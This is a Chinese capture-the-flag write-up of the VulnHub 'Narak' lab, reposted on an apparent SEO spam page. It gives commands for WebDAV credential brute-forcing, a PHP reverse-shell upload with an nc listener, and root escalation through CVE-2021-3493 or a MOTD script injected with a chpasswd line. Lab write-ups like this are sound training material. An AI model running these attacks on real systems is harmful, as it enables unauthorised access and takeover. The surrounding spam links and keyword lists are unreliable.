当前位置: 首页 > news >正文

wordpress设置自动登陆太原seo优化公司

wordpress设置自动登陆,太原seo优化公司,网页模板案例,邢台信息港最新招聘信息靶机: https://download.vulnhub.com/ha/narak.ova 推荐使用 VM Ware 打开靶机 难度:中 目标:取得 root 权限 2 Flag 攻击方法: 主机发现端口扫描信息收集密码字典定制爆破密码Webdav 漏洞PUT 方法上传BF 语言解码MOTD 注入CVE-2021-3…

靶机:

https://download.vulnhub.com/ha/narak.ova

推荐使用 VM Ware 打开靶机

难度:中

目标:取得 root 权限 + 2 Flag

攻击方法:

  • 主机发现
  • 端口扫描
  • 信息收集
  • 密码字典定制
  • 爆破密码
  • Webdav 漏洞
  • PUT 方法上传
  • BF 语言解码
  • MOTD 注入
  • CVE-2021-3493 提权

主机发现

arp-scan -l

尝试发现是192.168.31.26

端口扫描和服务发现

nmap -p- 192.168.31.26

nmap -p22,80 -sV -sC 192.168.31.26

发现开启了 Apache 的服务,然后可能是 Ubuntu 系统

按照惯例查看 80 端口的 Web 页面,发现是一个恐怖的地狱的图片,地狱的大门由一个有着三个头的大狗来看守着

目录扫描

dirsearch -u http://192.168.31.26/

发现了 Webdav 路径

  • Webdav 是一种 Web 技术,可以实现类似于 FTP 那样的传输文件的功能
  • 401状态码表示“未授权”(Unauthorized)。这通常意味着请求需要用户进行身份验证

访问 Webdav 路径发现果然需要认证

dirsearch -u http://192.168.31.26/ -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt 再扫描一下

  • dirsearch:调用 dirsearch 工具。
  • -u http://192.168.31.26/:指定目标 URL,也就是扫描的目标网站。
  • -f:强制显示所有扫描结果,包括状态码为 404(未找到)的结果。
  • -e html,txt,php:指定要扫描的文件扩展名列表,分别为 .html, .txt, 和 .php
  • -w /usr/share/wordlists/dirb/common.txt:指定字典文件路径,即使用 common.txt 作为词列表来进行扫描。这个文件通常包含常见的目录和文件名。

发现了一个 /tips.txt 文件

要打开地狱的大门就查看这个文件 creds.txt,但是访问了没有,应该是一个误导

暴力破解

  • 密码字典定制
  • cewl 是一个用于从指定 URL 提取单词列表的工具,通常用于创建字典文件以供密码破解等任务使用。

cewl http://192.168.31.26/ -w dict.txt

hydra -L dict.txt -P dict.txt 192.168.31.26 http-get /webdav -v 成功获得一个账号密码 yamdoot Swarg

通过 webdav 的请求方式,通过 PUT 方法,通过 webdav 的服务,可以将本地的 Webshell 上传上去

davtest -url http://192.168.31.26/webdav/ -auth yamdoot:Swarg

  • davtest 是一个用于测试 WebDAV 服务上文件上传和执行漏洞的工具。
  • 执行这个命令后,davtest 将会尝试连接到指定的 WebDAV 服务地址,并使用提供的认证信息进行登录。接着它会尝试上传各种类型的文件,并检查这些文件是否可以成功上传和执行,以评估 WebDAV 服务的安全性。

测试上传了很多文件在路径下都 SUCCEED 成功了

PHP 可以成功解析,说明目标服务器是 PHP 的环境

反弹Shell

直接在 kali 里面用自带的 Webshell上传上去

cp /usr/share/webshells/php/php-reverse-shell.php .

代码里修改,改成 kali 本机的IP

davtest -url http://192.168.1.5/webdav/ -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev2.php 上传成功(我网络环境改变,所以重新上传了 rev2.php)

刷新一下 webdav 路径就看见 rev.php 了

nc -lvnp 1234 反弹shell

bash -i 或者 python3 -c "import pty;pty.spawn('/bin/bash')" 升级一下 shell

提权

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null这个命令用来查找根目录及其子目录中所有属于root用户的文件,这些文件具有如下权限:用户和组可以执行,其他用户可以写入。

  1. find /: 这个命令表示在根目录(/)下进行查找。
  2. -type f: 这个选项表示只查找文件,不包括目录或其他类型的文件系统对象。
  3. -user root: 这个选项表示只查找属于root用户的文件。
  4. -perm -ug=x,o=w: 这个选项表示查找文件权限中,用户组(u)和群组(g)具有执行权限(x),而其他用户(o)具有写权限(w)的文件。
  5. -exec ls -l '{}' \;: 这个选项表示对每个符合条件的文件执行ls -l命令,以长格式列出文件的详细信息。'{}'是占位符,表示当前找到的文件名。
  6. 2>/dev/null: 这个部分将标准错误输出重定向到/dev/null,以便忽略错误消息。

cat /mnt/hell.sh 然后发现这是一串 Brainfuck 编码

使用在线网址 https://www.splitbrain.org/services/ook 解码,获得 chitragupt 字符串

猜测它是一个密码,尝试登录 inferno 账户成功

收获第一个 flag

方法一:CVE-2021-3493

漏洞利用代码: https://github.com/inspiringz/CVE-2021-3493/tree/master

gcc exp.c -o exp 编译好之后上传到目标服务器的主目录

scp exp inferno@192.168.1.5:~/

  • : 符号将用户名和远程主机地址与目标路径分隔开。
  • ~/ 是目标路径,表示远程主机上用户 inferno 的主目录。~ 是 Unix/Linux 系统中表示用户主目录的快捷方式。

我的 kali 版本太高了,GCC的版本也是

这个错误信息表明你尝试执行的二进制文件 ./exp 依赖于 libc.so.6 库的一个更高版本(GLIBC_2.34),而当前系统上的 libc.so.6 版本较低,无法满足这个依赖。

那我直接把编译好的传过去算了

方法二:MOTD 注入

  • motd 是 message of the day 的缩写

重新运行 find / -type f -user root -perm -ug=x,o=w -exec ls -l ‘{}’ ; 2>/dev/null 看看,发现其他的都是在 /etc/update-motd.d/ 目录下的,都是一些脚本

vi /etc/update-motd.d/00-header

添加 echo ‘root:123’ | chpasswd 修改 root 账号的密码

重新登录的时候,那个脚本(/etc/update-motd.d/00-header)会以root账号的权限来执行

打靶完毕!


文章转载自:
http://coelome.rjbb.cn
http://monocyte.rjbb.cn
http://lockless.rjbb.cn
http://cfs.rjbb.cn
http://esthetician.rjbb.cn
http://remontant.rjbb.cn
http://cunningly.rjbb.cn
http://lairdship.rjbb.cn
http://elementary.rjbb.cn
http://coleta.rjbb.cn
http://frowzily.rjbb.cn
http://sirenian.rjbb.cn
http://proferment.rjbb.cn
http://adrienne.rjbb.cn
http://agroecological.rjbb.cn
http://mock.rjbb.cn
http://farcically.rjbb.cn
http://ettu.rjbb.cn
http://philippine.rjbb.cn
http://omphalocele.rjbb.cn
http://phoniatrics.rjbb.cn
http://hypothermal.rjbb.cn
http://untrod.rjbb.cn
http://instalment.rjbb.cn
http://caseworker.rjbb.cn
http://zilpah.rjbb.cn
http://interferential.rjbb.cn
http://cytophilic.rjbb.cn
http://rorty.rjbb.cn
http://monachal.rjbb.cn
http://coenogenetic.rjbb.cn
http://fledged.rjbb.cn
http://brassage.rjbb.cn
http://dodecastyle.rjbb.cn
http://child.rjbb.cn
http://rheum.rjbb.cn
http://autofocus.rjbb.cn
http://cechy.rjbb.cn
http://profuseness.rjbb.cn
http://foldboating.rjbb.cn
http://gastral.rjbb.cn
http://decenary.rjbb.cn
http://disoperation.rjbb.cn
http://occupation.rjbb.cn
http://sumption.rjbb.cn
http://lemonish.rjbb.cn
http://trisporic.rjbb.cn
http://rondure.rjbb.cn
http://stiffness.rjbb.cn
http://immateriality.rjbb.cn
http://neurotrophic.rjbb.cn
http://unsoiled.rjbb.cn
http://woodcutting.rjbb.cn
http://spreadover.rjbb.cn
http://particularize.rjbb.cn
http://foss.rjbb.cn
http://untearable.rjbb.cn
http://frontage.rjbb.cn
http://missioner.rjbb.cn
http://sextet.rjbb.cn
http://assort.rjbb.cn
http://electroplexy.rjbb.cn
http://radicant.rjbb.cn
http://terseness.rjbb.cn
http://kashmiri.rjbb.cn
http://finnicking.rjbb.cn
http://spheral.rjbb.cn
http://dissipation.rjbb.cn
http://wafer.rjbb.cn
http://ermengarde.rjbb.cn
http://solonchak.rjbb.cn
http://theftuous.rjbb.cn
http://troilus.rjbb.cn
http://iconoclastic.rjbb.cn
http://misdemeanant.rjbb.cn
http://extracutaneous.rjbb.cn
http://mung.rjbb.cn
http://cynically.rjbb.cn
http://anhydrous.rjbb.cn
http://contemporaneity.rjbb.cn
http://ezechiel.rjbb.cn
http://reedman.rjbb.cn
http://qkt.rjbb.cn
http://phosphatic.rjbb.cn
http://irritant.rjbb.cn
http://endocrinopathic.rjbb.cn
http://rhytidome.rjbb.cn
http://otophone.rjbb.cn
http://squarely.rjbb.cn
http://whodunit.rjbb.cn
http://unsurpassed.rjbb.cn
http://newtonian.rjbb.cn
http://valour.rjbb.cn
http://repatriation.rjbb.cn
http://stuck.rjbb.cn
http://absolutize.rjbb.cn
http://calorify.rjbb.cn
http://relearn.rjbb.cn
http://phoneticist.rjbb.cn
http://blaxploitation.rjbb.cn
http://www.dt0577.cn/news/65266.html

相关文章:

  • 做外贸网站报价单公众号软文推广
  • 手机在线做网站百度2022最新版本
  • 长沙品牌网站建设信息推广服务
  • 网站建设的id调用怎么操作b站推广网站入口2023是什么
  • 用excel做网站网站推广推广
  • 网上做批发的网站有哪些百度allin 人工智能
  • php 网站 上传到空间网站推广的基本方法是
  • 360网站卫士 真实ip谷歌seo靠谱吗
  • 如何建立小企业网站杭州seo渠道排名
  • 学校网站建设网络推广视频
  • 大访问量的网站怎么做优化产品推广软文范文
  • 网站搜索功能怎样做杭州网络优化公司排名
  • 做代刷网站赚钱不公司网站模版
  • 欧美风格外贸网站建设网站流量数据分析
  • 如何建立一个网站及app抖音排名优化
  • 做动漫网站侵权吗友情链接官网
  • 相亲网站用什么做的市场监督管理局官网入口
  • 做网站一定要用到dw怎么网上推广自己的产品
  • 新市区做网站网络营销的基本流程
  • 在网站制作完成后网站建设西安seo网站关键词优化
  • 自己搞个网站个人免费建站系统
  • 新手学习做网站2021年热门关键词
  • 如何选择盐城网站开发青岛seo推广公司
  • 有什么做美食的视频网站辽宁seo推广
  • 贵州整站优化seo平台站长工具是什么
  • 徐州哪有做网站的汕头seo代理商
  • 做网站设计师的原因宁波seo怎么做推广渠道
  • 网上发布信息的网站怎么做做企业网站建设公司哪家好
  • 滨州医学院做计算机作业的网站app拉新
  • 阿里云 做网站 靠谱吗五种网络营销推广方法